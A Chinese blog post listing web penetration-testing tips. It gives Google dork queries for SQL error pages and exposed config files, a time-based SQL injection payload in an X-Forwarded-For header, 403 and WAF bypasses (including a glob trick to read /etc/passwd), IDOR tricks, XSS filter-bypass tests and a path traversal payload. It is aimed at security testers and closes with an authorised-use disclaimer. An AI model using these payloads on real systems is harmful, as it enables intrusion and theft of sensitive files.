思路收集于网络,安全小天地只是做了一点整理。
1.利用google语法 发现注入:
site:target.com intext:"sql syntax near" | intext:"incorrect syntax near"
site:target.com intext:"sql syntax near" | intext:"syntax error has occurred" | intext:"incorrect syntax near" | intext:"unexpected end of SQL command" | intext:"Warning: mysql_connect()" | intext:"Warning: mysql_query()" | intext:"Warning: pg_connect()"
site:"example[.]com" ext:log | ext:txt | ext:conf | ext:cnf | ext:ini | ext:env | ext:sh | ext:bak | ext:backup | ext:swp | ext:old | ext:~ | ext:git | ext:svn | ext:htpasswd | ext:htaccess
2.备份文件
config.inc.php.bk扫到敏感信息,在字典中批量加入一些配置文件的备份是很有必要的,当然常规的zip等字典还是要自己经常维护更新哦
3.xff测试
X-Forwarded-for简称XFF头,它代表客户端真实的IP,通过修改X-Forwarded-for的值可以伪造客户端IP。
现在大部分系统会记录登录者的ip,在登录的时候利用xff测试sql注入
X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z
4.403bypass:
/admin/files --> 302 /authFailure
/adminFUZZ/files --> 200
/admin/FUZZ/files --> 200
5.通配符绕过
当遇到WAF或过滤器来阻止RCE和LFI时,您可以通过globbing绕过它。
/usr/bin/cat /etc/passwd == /???/???/c?t$IFS/???/p?s?w?
6.关于逻辑漏洞小tips
IDOR,Insecure Direct Object reference,即"不安全的直接对象引用",场景为基于用户提供的输入对象进行访问时,未进行权限验证。IDOR漏洞其实在越权(Broken Access Control)漏洞的范畴之内,也可以说是逻辑漏洞,或是访问控制漏洞,国内通常被称为越权漏洞。
在测试idor的时候把 node/1,2,3 换成 /node/001, /node/011 发现了idor漏洞
7.修改参数
GET /v1/transactions/all
GET /v1/transactions/813 发现idor漏洞
8.xss bypass
<a href=http://example[.]com> ✅
<a href=aaa:bbb> ✅
<a href=javascript:bbb> ❌
<a href=jav%26%23x61%3bscript:alert()> ????
9.任意文件读取:
Payload: GET /assets/css///////../../../../../../../../etc/passwd
© 版权声明
渗透云记的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。
渗透云记拥有对此文章的修改、删除和解释权限,如转载或传播此文章,需保证文章的完整性,未经允许,禁止转载!
本文所提供的工具仅用于学习,禁止用于其他,请在24小时内删除工具文件!!!访问本博客请务必遵守有关互联网的相关法律、规定与规则。一旦您访问本博客,即表示您已经知晓并接受了此声明通告。详情见本站的“免责声明”如果有侵权之处请第一时间联系我们删除。敬请谅解!E-mail:admin@encenc.com
THE END










请登录后查看评论内容